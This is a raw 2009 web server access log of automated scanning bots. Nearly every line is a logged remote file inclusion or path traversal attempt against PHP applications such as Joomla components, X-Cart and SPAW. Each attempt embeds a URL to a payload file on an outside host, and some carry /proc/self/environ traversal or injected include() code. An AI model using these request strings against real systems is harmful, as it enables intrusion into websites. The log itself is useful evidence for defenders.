67.212.165.114 - - [26/May/2009:10:28:23 -0500] "GET /logs/access_log.1239321600///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 383 "-""Mozilla/5.0"
66.219.99.129 - - [26/May/2009:10:30:31 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
66.219.99.129 - - [26/May/2009:10:30:31 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
66.7.201.86 - - [26/May/2009:10:33:12 -0500] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.826"
66.7.201.86 - - [26/May/2009:10:33:12 -0500] "GET //convert/mvcw.php?step=1&vwar_root=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.826"
66.7.201.86 - - [26/May/2009:10:33:13 -0500] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.826"
66.7.201.86 - - [26/May/2009:10:33:13 -0500] "GET //convert/mvcw.php?step=1&vwar_root=http://orsosteel.ru/cms_files/Image/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.826"
77.221.130.12 - - [26/May/2009:10:35:39 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.221.130.12 - - [26/May/2009:10:35:39 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 326 "-""libwww-perl/5.805"
67.212.165.114 - - [26/May/2009:10:36:41 -0500] "GET /logs//include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:36:41 -0500] "GET //include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:36:59 -0500] "GET /logs//include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:36:59 -0500] "GET //include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:37:21 -0500] "GET /logs//include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:37:21 -0500] "GET //include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:37:31 -0500] "GET //include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:37:31 -0500] "GET /logs//include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:37:52 -0500] "GET //include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:37:53 -0500] "GET /logs//include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:37:58 -0500] "GET /logs//include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:37:58 -0500] "GET //include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:38:10 -0500] "GET //include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:38:15 -0500] "GET /logs//include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:38:25 -0500] "GET /logs//include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:38:25 -0500] "GET //include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:38:50 -0500] "GET //include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:38:50 -0500] "GET /logs//include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:39:05 -0500] "GET /logs//include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:39:05 -0500] "GET //include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:39:12 -0500] "GET //include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:39:17 -0500] "GET /logs//include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:39:24 -0500] "GET /logs//include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:39:29 -0500] "GET //include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:39:30 -0500] "GET /logs//include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.825"
67.212.165.114 - - [26/May/2009:10:39:35 -0500] "GET //include/write.php?dir=http://alibi-pcportable.fr//administrator/help/idi.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.825"
58.227.193.198 - - [26/May/2009:10:43:53 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
58.227.193.198 - - [26/May/2009:10:43:53 -0500] "GET /errors.php?error=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
58.227.193.198 - - [26/May/2009:10:43:53 -0500] "GET /logs/errors.php?error=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
58.227.193.198 - - [26/May/2009:10:48:06 -0500] "GET /logs/access_log.1241136000/errors.php?error=http://www.laxestereo.com/liverequest/req/copyright???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.246.20.221 - - [26/May/2009:10:52:41 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
218.246.20.221 - - [26/May/2009:10:52:42 -0500] "GET /logs/access_log.1237680000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
218.246.20.221 - - [26/May/2009:10:52:58 -0500] "GET /logs/access_log.1236816000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 370 "-""Mozilla/5.0"
83.143.81.26 - - [26/May/2009:10:55:21 -0500] "GET /logs/access_log.1237766400/?_zb_path=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
83.143.81.26 - - [26/May/2009:10:55:21 -0500] "GET /?_zb_path=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
83.143.81.26 - - [26/May/2009:10:55:23 -0500] "GET /logs/?_zb_path=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
83.143.81.26 - - [26/May/2009:10:55:34 -0500] "GET /logs/access_log.1236124800/?_zb_path=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:10:58:08 -0500] "GET /logs/access_log.1237766400/?_zb_path=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:10:58:09 -0500] "GET /logs/?_zb_path=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:10:58:10 -0500] "GET /?_zb_path=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:10:58:52 -0500] "GET /logs/access_log.1236124800/?_zb_path=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.43.202.66 - - [26/May/2009:10:59:01 -0500] "GET /logs/access_log.1233014400/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.43.202.66 - - [26/May/2009:10:59:01 -0500] "GET /errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.43.202.66 - - [26/May/2009:10:59:01 -0500] "GET /logs/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
193.34.167.192 - - [26/May/2009:10:59:24 -0500] "GET /logs//admin/auth.php?xcart_dir=http://axioma-dch.com/servicios/stats.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
193.34.167.192 - - [26/May/2009:10:59:24 -0500] "GET /logs/access_log.1241654400//admin/auth.php?xcart_dir=http://axioma-dch.com/servicios/stats.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
193.34.167.192 - - [26/May/2009:10:59:24 -0500] "GET //admin/auth.php?xcart_dir=http://axioma-dch.com/servicios/stats.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
193.34.167.192 - - [26/May/2009:10:59:31 -0500] "GET /logs/access_log.1240704000//admin/auth.php?xcart_dir=http://axioma-dch.com/servicios/stats.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
211.43.202.66 - - [26/May/2009:11:00:17 -0500] "GET /logs/access_log.1236643200/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.43.202.66 - - [26/May/2009:11:00:59 -0500] "GET /errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.43.202.66 - - [26/May/2009:11:00:59 -0500] "GET /logs/access_log.1233014400/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.43.202.66 - - [26/May/2009:11:00:59 -0500] "GET /logs/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
195.34.78.110 - - [26/May/2009:11:01:39 -0500] "GET //admin/auth.php?xcart_dir=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
195.34.78.110 - - [26/May/2009:11:01:39 -0500] "GET /logs//admin/auth.php?xcart_dir=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
195.34.78.110 - - [26/May/2009:11:01:39 -0500] "GET /logs/access_log.1241654400//admin/auth.php?xcart_dir=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
195.34.78.110 - - [26/May/2009:11:01:48 -0500] "GET /logs/access_log.1240704000//admin/auth.php?xcart_dir=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
65.55.106.112 - - [26/May/2009:11:01:54 -0500] "GET /logs/access_log.1147305600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.43.202.66 - - [26/May/2009:11:02:08 -0500] "GET /logs/access_log.1236643200/errors.php?error=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.233.22.209 - - [26/May/2009:11:02:08 -0500] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
211.233.22.209 - - [26/May/2009:11:02:09 -0500] "GET ///index.php?_SERVER[DOCUMENT_ROOT]=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
207.182.143.50 - - [26/May/2009:11:03:07 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.crimereportslive.com/paypal/WebConsole/modules/chi.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
207.182.143.50 - - [26/May/2009:11:03:07 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.crimereportslive.com/paypal/WebConsole/modules/chi.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
211.43.202.66 - - [26/May/2009:11:04:37 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.43.202.66 - - [26/May/2009:11:04:37 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.43.202.66 - - [26/May/2009:11:04:37 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.43.202.66 - - [26/May/2009:11:04:42 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.43.202.66 - - [26/May/2009:11:04:42 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.43.202.66 - - [26/May/2009:11:04:42 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.43.202.66 - - [26/May/2009:11:05:02 -0500] "GET /logs/access_log.1242000000//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.43.202.66 - - [26/May/2009:11:05:26 -0500] "GET /logs/access_log.1242000000//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
196.40.83.75 - - [26/May/2009:11:06:33 -0500] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://opall.fr//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.810"
196.40.83.75 - - [26/May/2009:11:06:33 -0500] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://opall.fr//assets/snippets/reflect/kontol.txt? HTTP/1.1" 404 292 "-""libwww-perl/5.810"
218.185.20.88 - - [26/May/2009:11:06:50 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:11:06:50 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:11:06:50 -0500] "GET /logs/access_log.1235088000//admin/spaw/spaw_control.class.php?spaw_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:11:06:59 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:11:06:59 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:11:07:00 -0500] "GET /logs/access_log.1235088000//admin/spaw/spaw_control.class.php?spaw_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:11:07:27 -0500] "GET /logs/access_log.1239753600//admin/spaw/spaw_control.class.php?spaw_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:11:07:33 -0500] "GET /logs/access_log.1239753600//admin/spaw/spaw_control.class.php?spaw_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
213.246.62.35 - - [26/May/2009:11:10:52 -0500] "GET ///components/com_virtuemart/export.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt???? HTTP/1.1" 404 321 "-""Mozilla/5.0"
213.246.62.35 - - [26/May/2009:11:10:57 -0500] "GET /logs///components/com_virtuemart/export.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
213.246.62.35 - - [26/May/2009:11:11:06 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/export.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
213.246.62.35 - - [26/May/2009:11:11:07 -0500] "GET /logs/access_log.1241481600///components/com_virtuemart/export.php?mosConfig_absolute_path=http://jamur.3dn.ru/id1.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
72.29.68.196 - - [26/May/2009:11:11:40 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/v6.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
72.29.68.196 - - [26/May/2009:11:11:40 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.nw.or.kr/bbs/icon/v6.txt???? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
124.217.252.20 - - [26/May/2009:11:12:42 -0500] "GET /logs/access_log.1241654400//admin/auth.php?xcart_dir=http://axioma-dch.com/servicios/stats.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
124.217.252.20 - - [26/May/2009:11:12:42 -0500] "GET //admin/auth.php?xcart_dir=http://axioma-dch.com/servicios/stats.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
124.217.252.20 - - [26/May/2009:11:12:59 -0500] "GET /logs//admin/auth.php?xcart_dir=http://axioma-dch.com/servicios/stats.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
60.29.28.2 - - [26/May/2009:11:14:25 -0500] "GET /logs/access_log.1237939200//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
60.29.28.2 - - [26/May/2009:11:14:25 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
60.29.28.2 - - [26/May/2009:11:14:25 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
60.29.28.2 - - [26/May/2009:11:14:46 -0500] "GET /logs/access_log.1239494400//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.120.236.61 - - [26/May/2009:11:19:37 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.120.236.61 - - [26/May/2009:11:19:47 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.21.254.165 - - [26/May/2009:11:19:54 -0500] "GET //admin/auth.php?xcart_dir=http://axioma-dch.com/servicios/stats.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
211.21.254.165 - - [26/May/2009:11:19:54 -0500] "GET /logs//admin/auth.php?xcart_dir=http://axioma-dch.com/servicios/stats.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
89.108.64.88 - - [26/May/2009:11:20:00 -0500] "GET /logs////index.php?_SERVER[DOCUMENT_ROOT]=http://www.ghetto.uz/readme.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.812"
89.108.64.88 - - [26/May/2009:11:20:06 -0500] "GET ////index.php?_SERVER[DOCUMENT_ROOT]=http://www.ghetto.uz/readme.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.812"
60.29.28.2 - - [26/May/2009:11:24:00 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
60.29.28.2 - - [26/May/2009:11:24:01 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
60.29.28.2 - - [26/May/2009:11:24:01 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
66.219.99.129 - - [26/May/2009:11:25:38 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
66.219.99.129 - - [26/May/2009:11:25:39 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
66.219.99.129 - - [26/May/2009:11:25:54 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
66.219.99.129 - - [26/May/2009:11:25:54 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
216.120.236.61 - - [26/May/2009:11:25:59 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://ircwar.altervista.org/conf/id.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
210.100.220.126 - - [26/May/2009:11:29:39 -0500] "GET /logs//errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
210.100.220.126 - - [26/May/2009:11:29:39 -0500] "GET //errors.php?error=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
216.119.103.12 - - [26/May/2009:11:37:24 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:11:37:24 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:11:37:24 -0500] "GET /logs/access_log.1239667200//admin/spaw/spaw_control.class.php?spaw_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:11:37:25 -0500] "GET /logs/access_log.1236643200//admin/spaw/spaw_control.class.php?spaw_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:11:37:30 -0500] "GET /logs/access_log.1237420800//admin/spaw/spaw_control.class.php?spaw_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:11:37:34 -0500] "GET /logs/access_log.1236556800//admin/spaw/spaw_control.class.php?spaw_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:11:37:40 -0500] "GET /logs/access_log.1236470400//admin/spaw/spaw_control.class.php?spaw_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:11:37:40 -0500] "GET /logs/access_log.1238889600//admin/spaw/spaw_control.class.php?spaw_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:11:37:40 -0500] "GET /logs/access_log.1237248000//admin/spaw/spaw_control.class.php?spaw_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:11:37:41 -0500] "GET /logs/access_log.1238198400//admin/spaw/spaw_control.class.php?spaw_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:11:37:49 -0500] "GET /logs/access_log.1242432000//admin/spaw/spaw_control.class.php?spaw_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:11:37:49 -0500] "GET /logs/access_log.1236902400//admin/spaw/spaw_control.class.php?spaw_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:11:37:50 -0500] "GET /logs/access_log.1240876800//admin/spaw/spaw_control.class.php?spaw_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:11:37:50 -0500] "GET /logs/access_log.1236729600//admin/spaw/spaw_control.class.php?spaw_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
